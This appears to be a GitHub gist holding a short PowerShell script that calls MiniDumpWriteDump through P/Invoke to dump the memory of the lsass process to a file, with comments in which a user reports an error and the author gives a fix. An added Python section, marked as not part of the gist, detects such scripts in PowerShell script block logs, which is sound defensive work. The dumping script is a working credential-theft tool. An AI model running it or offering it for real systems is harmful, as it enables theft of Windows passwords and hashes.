@dmaasland
Created November 27, 2019 12:28
$Source = @"
using System;
using System.Runtime.InteropServices;
namespace ProcDump {
    public static class DbgHelp {
        [DllImport("Dbghelp.dll")]
        public static extern bool MiniDumpWriteDump(IntPtr hProcess, uint ProcessId, IntPtr hFile, IntPtr DumpType, IntPtr ExceptionParam, IntPtr UserStreamParam, IntPtr CallbackParam);
    }
}
"@
If (-Not "ProcDump" -as [Type]) {
    Add-Type -TypeDefinition $Source
}
$Process = [System.Diagnostics.Process]::GetProcessesByName("lsass")
$DumpPath = "C:\temp\$($Process.Name).dmp"
$DumpStream = [System.IO.FileStream]::new($DumpPath, [System.IO.FileMode]::Create)
$DumpType = [IntPtr]::new(2)
$Dump = [ProcDump.DbgHelp]::MiniDumpWriteDump($Process.Handle, $Process.Id, $DumpStream.Handle, $DumpType, [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero)
$DumpStream.Dispose()
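
Detection side, as an added example that is not part of the gist: with PowerShell script block logging enabled, a script like the one above is recorded as Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log, and long scripts are split into numbered fragments. The sketch below reassembles fragments per ScriptBlockId before matching the P/Invoke declaration, the API name and the lsass target seen in this script; the event dictionaries are constructed samples and the function names are hypothetical.

```python
import re
from collections import defaultdict

# Strings taken from the script on this page. Matching is case-insensitive
# because PowerShell identifiers and DLL file names are.
INDICATORS = {
    "dump_api": re.compile(r"MiniDumpWriteDump", re.I),
    "pinvoke": re.compile(r'DllImport\s*\(\s*"dbghelp(\.dll)?"', re.I),
    "lsass_target": re.compile(r"\blsass\b", re.I),
}

# Constructed sample records (not real logs), using 4104 field names.
# Script "aaaa-1" arrives out of order and is split in the middle of the API name.
SAMPLE_EVENTS = [
    {"EventID": 4104, "ScriptBlockId": "aaaa-1", "MessageNumber": 2, "MessageTotal": 2,
     "ScriptBlockText": 'Dump(IntPtr hProcess);\n$P = [Diagnostics.Process]::GetProcessesByName("lsass")'},
    {"EventID": 4104, "ScriptBlockId": "aaaa-1", "MessageNumber": 1, "MessageTotal": 2,
     "ScriptBlockText": '[DllImport("Dbghelp.dll")]\npublic static extern bool MiniDumpWrite'},
    {"EventID": 4104, "ScriptBlockId": "bbbb-2", "MessageNumber": 1, "MessageTotal": 1,
     "ScriptBlockText": "Get-Process lsass | Select-Object Id, WorkingSet"},
    {"EventID": 4103, "ScriptBlockId": "cccc-3", "MessageNumber": 1, "MessageTotal": 1,
     "ScriptBlockText": "module logging record, ignored by this check"},
]

def reassemble(events):
    """Join 4104 fragments (MessageNumber of MessageTotal) per ScriptBlockId."""
    parts = defaultdict(dict)
    for ev in events:
        if ev.get("EventID") == 4104:
            parts[ev["ScriptBlockId"]][ev["MessageNumber"]] = ev["ScriptBlockText"]
    return {sid: "".join(text for _, text in sorted(frags.items()))
            for sid, frags in parts.items()}

def find_lsass_dump_scripts(events):
    """Return {ScriptBlockId: indicator names} for blocks matching every indicator."""
    hits = {}
    for sid, text in reassemble(events).items():
        matched = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
        if len(matched) == len(INDICATORS):
            hits[sid] = matched
    return hits

if __name__ == "__main__":
    print(find_lsass_dump_scripts(SAMPLE_EVENTS))
```

Matching each fragment on its own would miss the API name here, since it straddles the fragment boundary; that is why the text is joined first.
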
@xsuperbug

xsuperbug commented Dec 3, 2019

Hi, I tested it on Win10 x64 but I got an error like

Unable to find type [ProcDump.DbgHelp].
At C:\procdump.ps1:22 char:9
+ $Dump = [ProcDump.DbgHelp]::MiniDumpWriteDump($Process.Handle, $Proce ...
+         ~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (ProcDump.DbgHelp:TypeName) [], RuntimeException
    + FullyQualifiedErrorId : TypeNotFound

@dmaasland
Author

Remove the "If" surrounding line 14 :)